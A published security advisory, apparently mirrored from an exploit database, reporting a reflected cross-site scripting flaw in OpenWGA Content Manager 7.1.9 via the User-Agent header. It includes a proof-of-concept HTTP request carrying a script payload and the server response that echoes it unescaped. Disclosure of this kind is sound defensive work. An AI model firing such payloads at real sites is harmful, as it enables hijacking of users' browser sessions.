###########################

# OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability

###########################

OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability


Vendor: Innovation Gate GmbH
Product web page: https://www.openwga.com
Affected version: OpenWGA Content Manager 7.1.9 (Build 230)
OpenWGA Admin Client 7.1.7 (Build 82)
OpenWGA Server 7.1.9 Maintenance Release (Build 642)

Summary: OpenWGA is an advanced open source java based enterprise CMS
platform featuring real WYSIWYG, a state of the art CMS IDE and more.

Desc: OpenWGA suffers from a cross-site scripting vulnerability when
input passed via the User-Agent HTTP header is not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: Apache/2.2.14 (Ubuntu)
Apache Tomcat/6.0.41
Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5316
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5316.php


23.02.2016

--


Request:
--------

GET /plugin-contentmanager HTTP/1.1
Host: localhost:8080
Accept: */*
Accept-Language: en
User-Agent: <script>alert(1)</script>
Connection: close


Response:
---------

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WGLastRedirectHex=; Path=/; Max-Age=0; HttpOnly
Pragma: No-Cache
Cache-Control: No-Cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 23 Feb 2016 14:02:49 GMT
Connection: close
Content-Length: 1902


<html>
<head>
<title>browser not supported: OpenWGA&#8482; Content Manager Version 7.1.9 Build 230</title>
<meta name="generator" content="OpenWGA... Server 7 'Wolf' Platform">

<span style="font-weight:bold"><script>alert(1)</script></span>

---

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-04-18]

###########################